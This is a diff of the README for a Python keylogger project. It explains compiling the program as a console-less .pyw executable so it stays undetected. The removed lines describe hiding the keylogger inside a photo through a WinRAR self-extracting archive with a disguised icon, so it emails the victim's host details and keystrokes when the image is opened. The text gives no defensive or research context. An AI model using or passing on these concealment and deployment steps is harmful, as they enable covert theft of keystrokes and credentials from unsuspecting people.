jsrcs/Python-Keylogger/README.md

 # Executable Compile
 This program can be compiled into a standalone using PyInstaller.
 If we save the file as a ".pyw" extension, the program will run in a mode "without console."
 This is to help stay undetected.
-## WinRAR Packaging
-Using WinRAR, we can package the files to be an SFX archive.
-The program will be embedded within a photo, and when it's opened, it will exectue the keylogger under the radar.
-We can disguise the icon and opening of the file, but can't change the file type to change from "Application".
-# Demonstration
-After opening the photo, the executable will run and begin sending emails of the host information and keystrokes.
-This loop will happen until the user presses the right control key, which terminates the program.